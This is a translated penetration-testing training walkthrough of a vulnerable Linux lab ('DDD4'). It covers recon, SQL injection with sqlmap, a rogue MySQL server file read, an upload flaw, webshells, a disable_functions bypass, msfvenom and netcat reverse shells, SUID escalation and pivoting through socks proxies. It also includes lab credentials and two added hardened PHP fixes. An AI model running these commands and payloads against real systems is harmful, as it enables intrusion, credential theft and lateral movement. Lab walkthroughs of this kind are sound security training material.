[Original] A complete Linux internal-network penetration test walkthrough
[Recommended] Dark Moon (moonsec) penetration testing training: more than ten years of penetration experience, systematic and efficient penetration-testing training. Add WeChat contact aptimeok for enquiries.
Note: this is a training technical document, so the process is not written out in full detail; the training videos cover it. To join the training, visit http://edu.moonsec.com
1. DDD4 lab introduction
This lab contains three flags. Import the downloaded virtual machine environment into your hypervisor; the network environment must be configured correctly for the lab to work.
1.1. Network diagram
2. Information gathering
2.1. Host discovery
sudo netdiscover -i eth0 -r 192.168.0.0/24
2.2. nmap host discovery
nmap -sn 192.168.0.0/24
2.3. masscan port scan
sudo masscan -p 1-65535 192.168.0.122 --rate=1000
2.4. nmap port and service information
kali@kali:~/ddd4$ nmap -sC -p 8888,3306,888,21,80 -A 192.168.0.122 -oA ddd4-port
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 01:41 EDT
Nmap scan report for 192.168.0.122
Host is up (0.0038s latency).
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
| ssl-cert: Subject: commonName=116.27.229.43/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN
| Not valid before: 2020-04-09T18:40:16
|_Not valid after:  2030-01-07T18:40:16
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache
|_http-title: \xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9
888/tcp  open  http    Apache httpd
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache
|_http-title: 403 Forbidden
3306/tcp open  mysql   MySQL 5.6.47-log
| mysql-info:
|   Protocol: 10
|   Version: 5.6.47-log
|   Thread ID: 72
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, LongPassword, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient, SupportsLoadDataLocal, ConnectWithDatabase, SupportsCompression, FoundRows, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: ~4%\!-_vU'`2soS06\NR
|_  Auth Plugin Name: mysql_native_password
8888/tcp open  http    Ajenti http control panel
| http-robots.txt: 1 disallowed entry
|_/
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was http://192.168.0.122:8888/login
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: Host: 0b842aa5.phpmyadmin
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.76 seconds
2.5. Binding the hostname in hosts
2.6. Advanced usage of gobuster
gobuster dir -u http://www.ddd4.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x 'php,zip,html,rar' -o ddd4.log --wildcard -l | grep -v 10430 | grep -v "Size: 49"
/contact (Status: 200) [Size: 9142]
/products (Status: 200) [Size: 12837]
/search (Status: 200) [Size: 7633]
/partners (Status: 200) [Size: 8912]
/news (Status: 200) [Size: 14705]
/jobs (Status: 200) [Size: 14399]
/aboutus (Status: 200) [Size: 10027]
/News (Status: 200) [Size: 14705]
/upload (Status: 403) [Size: 261]
/service (Status: 200) [Size: 11713]
/skins (Status: 403) [Size: 261]
/Products (Status: 200) [Size: 12837]
/Contact (Status: 200) [Size: 9142]
/vote (Status: 200) [Size: 10708]
/aboutUs (Status: 200) [Size: 10027]
/AboutUs (Status: 200) [Size: 10027]
/temp (Status: 403) [Size: 261]
/config (Status: 403) [Size: 261]
/404.html (Status: 200) [Size: 1763]
/guestbook (Status: 200) [Size: 11408]
/NEWS (Status: 200) [Size: 14705]
/setup (Status: 403) [Size: 261]
/inc (Status: 403) [Size: 261]
/Jobs (Status: 200) [Size: 14399]
/editor (Status: 403) [Size: 261]
/Partners (Status: 200) [Size: 8912]
/certificate (Status: 200) [Size: 8453]
/LICENSE (Status: 403) [Size: 261]
/Service (Status: 200) [Size: 11713]
/joinus (Status: 200) [Size: 9281]
/loader (Status: 301) [Size: 297]
/industrynews (Status: 200) [Size: 11745]
/Vote (Status: 200) [Size: 10708]
/CONTACT (Status: 200) [Size: 9142]
/webmap (Status: 200) [Size: 10834]
/JoinUs (Status: 200) [Size: 9281]
3. Penetration testing of the target
3.1. Exploiting the SQL injection with sqlmap and an encoding tamper script
sqlmap -u http://www.ddd4.com/search?keyword=11 --tamper chardoubleencode.py -v 1 --batch -p keyword
sqlmap -u http://www.ddd4.com/search?keyword=11 --tamper chardoubleencode.py -v 1 --batch -p keyword -D www_ddd4_com --dump -T doc_user
Table: doc_user
[1 entry]
Columns:
id | ip | qq | age | msn | pwd | sex | mtel | name | role | email | dtTime | address | cropPic | auditing | nickname | smallPic | username | lastlogin | originalPic
Row:
1 | 192.168.0.107 | <blank> | <blank> | <blank> | 33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0 | 1 | <blank> | <blank> | 10 | admin@localhost | 2020-04-24 19:45:38 | webadmin | <blank> | <blank> | 1 | 创始人 | <blank> | admin | 0 | <blank>
Of interest: webadmin / admin, with the stored password value
33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
This value is an encrypted string and could not be decoded back to the plaintext.
3.2. Exploiting the "malicious MySQL server reads client files" vulnerability
Downloaded a copy of the CMS source from the internet and found setup\setup.php:
<?php
// Connection parameters are taken straight from the request, so the caller
// chooses which MySQL server this script connects to.
$dbhost = $_REQUEST['dbhost'];
$uname = $_REQUEST['uname'];
$pwd = $_REQUEST['pwd'];
$dbname = $_REQUEST['dbname'];
if($_GET['action']=="chkdb"){
    // "chkdb": connect and report whether $dbname already exists.
    $con = @mysql_connect($dbhost,$uname,$pwd);
    if (!$con){
        die('-1');
    }
    $data = array();
    $rs = mysql_query('show databases;');
    while($row = mysql_fetch_assoc($rs)){
        $data[] = $row['Database'];
    }
    unset($rs, $row);
    mysql_close();
    if (in_array(strtolower($dbname), $data)){
        echo '1';
    }else{
        echo '0';
    }
}elseif($_GET['action']=="creatdb"){
    // "creatdb": create the database; $dbname is interpolated directly into the statement.
    if(!$dbname){
        die('0');
    }
    $con = @mysql_connect($dbhost,$uname,$pwd);
    if (!$con){
        die('-1');
    }
    if (mysql_query("CREATE DATABASE {$dbname} DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci",$con)){
        echo "1";
    }else{
        echo mysql_error();
    }
    mysql_close($con);
}
exit;
?>
The relevant part is the connection:
$dbhost = $_REQUEST['dbhost'];
$uname = $_REQUEST['uname'];
$pwd = $_REQUEST['pwd'];
$dbname = $_REQUEST['dbname'];
if($_GET['action']=="chkdb"){
    $con = @mysql_connect($dbhost,$uname,$pwd);
    if (!$con){
        die('-1');
    }
Because dbhost comes from the request, this script will connect to any remote MySQL server, so the MySQL client-side file-read bug (a malicious server asking the connecting client for a local file) can be used to read files from the web server.
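A hardened version of the chkdb action, added here as an example (it is not the CMS's own code): the database host is restricted to an operator-defined allowlist, the installer refuses to run once an install.lock file exists, and the client disables LOAD DATA LOCAL INFILE so that a malicious server cannot request files from the web host. The install.lock name, the $allowedHosts list, the POST-only handling and the switch from the removed mysql_* functions to mysqli are assumptions.

```php
<?php
// Hardened "chkdb" installer check (added example, not the CMS's own code).
// Assumptions: PHP 7+ with mysqli; an install.lock file in this directory
// marks the site as installed and disables the installer.

// 1. Refuse to run once the site is installed.
if (file_exists(__DIR__ . '/install.lock')) {
    http_response_code(403);
    exit('installer is locked');
}

// 2. Only the database server(s) the operator approved may be contacted.
//    Taking $dbhost from the request let a rogue MySQL server be specified.
$allowedHosts = array('127.0.0.1', 'localhost');   // constructed allowlist

function checkDatabase(array $req, array $allowedHosts)
{
    $dbhost = isset($req['dbhost']) ? (string) $req['dbhost'] : '';
    $uname  = isset($req['uname'])  ? (string) $req['uname']  : '';
    $pwd    = isset($req['pwd'])    ? (string) $req['pwd']    : '';
    $dbname = isset($req['dbname']) ? (string) $req['dbname'] : '';

    if (!in_array($dbhost, $allowedHosts, true)) {
        return '-2';   // host not permitted
    }
    // Database names are restricted to a safe character set so they can never
    // carry SQL into a later CREATE DATABASE statement.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $dbname)) {
        return '-3';
    }

    $con = mysqli_init();
    // 3. Disable LOAD DATA LOCAL INFILE on the client side: even if a malicious
    //    server asks for a file, this client refuses to send one.
    mysqli_options($con, MYSQLI_OPT_LOCAL_INFILE, 0);
    if (!@mysqli_real_connect($con, $dbhost, $uname, $pwd)) {
        return '-1';
    }

    $found = false;
    if ($rs = mysqli_query($con, 'SHOW DATABASES')) {
        while ($row = mysqli_fetch_assoc($rs)) {
            if (strtolower($row['Database']) === strtolower($dbname)) {
                $found = true;
            }
        }
        mysqli_free_result($rs);
    }
    mysqli_close($con);
    return $found ? '1' : '0';
}

if (isset($_GET['action']) && $_GET['action'] === 'chkdb') {
    // Credentials are accepted from POST only, so a crafted GET link cannot drive the check.
    echo checkDatabase($_POST, $allowedHosts);
}
exit;
```

The allowlist is the decisive control: with it in place the script can no longer be pointed at an attacker-controlled server at all, and the MYSQLI_OPT_LOCAL_INFILE setting is a second layer in case the allowlist is ever loosened. Deleting or locking the installer after deployment removes the endpoint entirely.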
3.3. Reading files with Rogue-MySql-Server
https://github.com/allyshka/Rogue-MySql-Server
vim rogue_mysql_server.py
http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=192.168.0.109&action=chkdb
3.4. Obtaining the web root path from an error message
The database connection file was obtained: dbname www_ddd4_com, username www_ddd4_com, password x4ix6ZrM7b8nFYHn
3.5. Logging in to MySQL
mysql -h192.168.0.122 -uwww_ddd4_com -px4ix6ZrM7b8nFYHn
3.6. Logging in to the admin panel using the stored ciphertext
The ciphertext cannot be cracked directly, so the only option is to replace it, log in, and then restore it afterwards; the replacement ciphertext is generated by modifying the program.
admin's plaintext is 33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
Modifying the ciphertext in the database
The original ciphertext:
33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
MySQL [www_ddd4_com]> update doc_user set pwd='33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0' where id=1;
Query OK, 1 row affected (0.005 sec)
Rows matched: 1  Changed: 1  Warnings: 0
Logged in to the admin panel successfully.
3.7. Admin-panel upload vulnerability
admini\controllers\system\bakup.php
function uploadsql()
{
    global $request;
    $uploadfile=basename($_FILES['uploadfile']['name']);
    // Size check: it inspects $_FILES['userfile'] while the file actually
    // saved is $_FILES['uploadfile'], and on failure it only prints an alert.
    if($_FILES['userfile']['size']>$request['max_file_size'])
        echo '<script>alert("您上传的文件超出了2M的限制!");window.history.go(-1);</script>';
    // Extension check (fileext() is the CMS's own helper): on failure it
    // prints an alert but does not stop.
    if(fileext($uploadfile)!='sql')
        echo '<script>alert("只允许上传sql格式文件!");window.history.go(-1);</script>';
    // Execution always reaches this point, so the file is saved regardless.
    $savepath = ABSPATH.'/temp/data/'.$uploadfile;
    if(move_uploaded_file($_FILES['uploadfile']['tmp_name'], $savepath))
    {
        echo '<script>alert("数据库SQL脚本文件上传成功!");window.history.go(-1);</script>';
    }
    else
    {
        echo '<script>alert("数据库SQL脚本文件上传失败!");window.history.go(-1);</script>';
    }
}
There is a logic flaw: neither failed check exits after printing its alert, so any file type can be uploaded. The request packet:
After uploading, the file cannot be executed: the .htaccess rules rewrite the URL and deny access to some directories.
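A hardened rewrite of uploadsql(), added here as an example (it is not the CMS's own code). Each failed check returns immediately, the size check inspects the same array that is saved, the stored filename is generated server-side with a fixed .sql extension, and the saved file is made non-executable. ABSPATH, $request['max_file_size'] and the name uploadsql_hardened are assumptions based on the original.

```php
<?php
// Hardened replacement for uploadsql() (added example, not the CMS's own code).
// Assumptions: ABSPATH is the site root defined by the CMS and $maxSize is the
// configured limit from $request['max_file_size'] (the original alert says 2M).

function uploadsql_hardened(array $file, int $maxSize, string $absPath): array
{
    // Every failed check returns at once: the original flaw was that the alert
    // was printed but execution fell through to move_uploaded_file().
    if (!isset($file['tmp_name'], $file['name'], $file['size'], $file['error'])
        || $file['error'] !== UPLOAD_ERR_OK) {
        return array(false, 'no file uploaded');
    }
    // Check the same array that is being saved (the original compared
    // $_FILES['userfile'] but saved $_FILES['uploadfile']).
    if ($file['size'] > $maxSize) {
        return array(false, 'file exceeds the size limit');
    }
    // Only the final extension counts, compared case-insensitively.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($ext !== 'sql') {
        return array(false, 'only .sql files are allowed');
    }
    // Never trust the client-supplied name: generate our own, with exactly one
    // extension, so no path component or double extension reaches the disk.
    $saveName = bin2hex(random_bytes(8)) . '.sql';
    $dir = rtrim($absPath, '/') . '/temp/data';
    if (!is_dir($dir)) {
        return array(false, 'upload directory missing');
    }
    $savePath = $dir . '/' . $saveName;
    if (!is_uploaded_file($file['tmp_name'])
        || !move_uploaded_file($file['tmp_name'], $savePath)) {
        return array(false, 'failed to store the file');
    }
    chmod($savePath, 0640);   // readable by the web server, never executable
    return array(true, $saveName);
}

// Usage (hypothetical caller inside the CMS controller):
// list($ok, $msg) = uploadsql_hardened($_FILES['uploadfile'], (int) $request['max_file_size'], ABSPATH);
```

Pair the code fix with a web-server rule that denies script execution under temp/data, which is what the .htaccess rules in this lab already did for some directories; the code-level fix is still needed because the original flaw let the file land on disk at all.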
3.8. Getting a webshell through template editing
4. Linux privilege escalation
4.1. Bypassing disable_functions
The Baota (BT) panel on this system configures PHP to block a long list of functions:
passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Some versions still leave out a few functions that can execute commands.
http://www.ddd4.com/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so
The reverse shell attempt failed.
4.2. Metasploit reverse shell
4.2.1. Generating the payload
sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=13777 -f elf >ddd4
4.2.2. Listening on the port
Start Metasploit with msfconsole:
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.109
LHOST => 192.168.0.109
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > exploit
4.2.3. Receiving the shell
Upload the file, add execute permission, and run it from its directory:
http://www.ddd4.com/bypass_disablefunc.php?cmd=chmod%20777%20ddd4&outpath=/tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so
http://www.ddd4.com/bypass_disablefunc.php?cmd=./ddd4&outpath=/tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so
4.3. Switching to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
With a netcat reverse shell instead, on the target:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 9001 >/tmp/f
listener on kali:
nc -lvnp 9001
then upgrade it the same way:
python -c 'import pty;pty.spawn("/bin/bash")'
4.4. Viewing users
www@host123:/www/wwwroot/www.ddd4.com$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
host123:x:1000:1000:host123,,,:/home/host123:/bin/bash
www@host123:/www/wwwroot/www.ddd4.com$
4.5. Getting the first flag.txt
4.6. The host123 user has a file bt.txt
www@host123:/www/wwwroot/www.ddd4.com$ cat /home/host123/bt.txt
Bt-Panel: http://116.27.229.43:8888/944906b5
username: gpeqnjf4
password: d12924fa
www@host123:/www/wwwroot/www.ddd4.com$
4.7. Escalating to root via SUID
find / -type f -perm -u=s 2>/dev/null
/lib/uncompress.so
/bin/ping
/bin/umount
/bin/su
/bin/ping6
/bin/mount
/bin/fusermount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/sbin/sensible-mda
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/find
find has the SUID bit set and can be used for privilege escalation: find test -exec whoami \;
4.8. The three main Linux enumeration scripts: usage and explanation
4.8.1. Using LinEnum
This script collects system information such as special file permissions, SUID files and network/port information. Start a web server on kali:
sudo python -m SimpleHTTPServer 80
then download and run the script on the target:
wget http://192.168.0.109/LinEnum.sh
The root password yanisy123 was found in the shell history.
4.8.2. Using linux-exploit-suggester
This one checks whether the system is affected by known privilege-escalation CVEs.
4.8.3. linuxprivchecker.py
This one checks privileges.
python linuxprivchecker.py
4.9. sudo privilege escalation
sudo -l shows which commands the host123 user may run.
4.10. The second flag
5. Cross-subnet penetration of the Linux internal network
5.1. Getting a high-privilege meterpreter
First use Metasploit to get a root-privileged meterpreter back, running the handler as a background job:
msf5 exploit(multi/handler) > exploit -j
5.2. NIC and routing information
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:c7:f2:4f
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.0.122
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::973d:c7c9:d30d:8cb8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : ens38
Hardware MAC : 00:0c:29:c7:f2:59
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.10.10.145
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::3b3c:b923:c6aa:54c3
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
5.3. Viewing the hosts file
cat /etc/hosts
5.4. Adding a Metasploit route into the internal network
meterpreter > run autoroute -s 10.10.10.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.0.122
[*] Use the -p option to list all active routes
5.4.1. Starting the socks4a module
msf5 exploit(multi/handler) > search sock4
[-] No results from search
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) >
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf5 auxiliary(server/socks4a) > set SRVPORT 22333
SRVPORT => 22333
msf5 auxiliary(server/socks4a) > exploit
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server
5.4.2. Proxying into the internal network with proxychains3
proxychains3 nmap -sT -Pn 10.10.10.144
The host turns out to run emlog; the admin panel's default password 123456 logs in, but proxychains3 is not very stable.
5.5.1. Setting the browser proxy
5.5.2. Getting a webshell from the admin panel
Download a copy of emlog, add a PHP backdoor file to a template, pack it, and upload the template archive through the emlog admin panel; once it is extracted, a PHP backdoor exists in the template's directory.
5.5.3. Generating a bind payload with Metasploit
sudo msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=13777 -f elf >ddd5
Upload it to the host123 machine.
http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=wget%20http://10.10.10.145/ddd5%20-o%20ddd5
chmod 777 ddd5, then run it: http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=./ddd5
5.5.4. Connecting to the remote shell
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 10.10.10.144
RHOST => 10.10.10.144
exploit
Normally this would connect, but possibly because the target is CentOS some code errors prevent the connection.
5.6. socks5 tunnel proxy into the internal network
The Metasploit socks4a proxy is not very stable in real environments; when it is unstable, it is better to use the rssocks proxy to reach the internal network.
Download: https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz
It must be compiled on both kali and host123. After downloading, extract and build:
tar -zxvf ssocks-0.0.14.tar.gz
cd ssocks-0.0.14
./configure && make
On kali run:
./rcsocks -l 2233 -p 1080 -vv
In the reverse shell on host123 run:
./rssocks -vv -s 192.168.0.109:1080
Use the browser proxy:
The speed is noticeably faster.
5.7. Configuring the proxychains3 socks5 proxy and running an nmap scan through it
Edit the file:
sudo vim /etc/proxychains.conf
proxychains3 nmap -sT -Pn 10.10.10.144
When proxied through the Metasploit socks4a proxy, neither Caidao nor AntSword could connect to the backdoor; with Caidao proxied through the socks5 proxy, it works normally.
5.9. Setting AntSword's socks5 proxy to reach the internal network
6. Cross-segment privilege escalation in the Linux internal network
6.1. Viewing port information
6.2. User information
Port 8080 is a wdcp host; old wdcp installations ship with default credentials.
Account admin, password wdlinux.cn
The host login's default password has been changed, but the MySQL default password has not, so it is possible to log in through phpMyAdmin.
The administrator's hash 17d03da6474ce8beb13b01e79f789e63 cracks to moonsec123.
Log in to the host and escalate privileges
In the "run command" section:
6.5. SSH key login
Generate a key in wdcp and save it.
On kali, set its permissions to 600.
proxychains3 ssh root@10.10.10.144 -i sshkey_wdcp
7. Follow us
8. Document download
Original article by moonsec. If reposting, please cite the source: https://www.moonsec.com/2009.html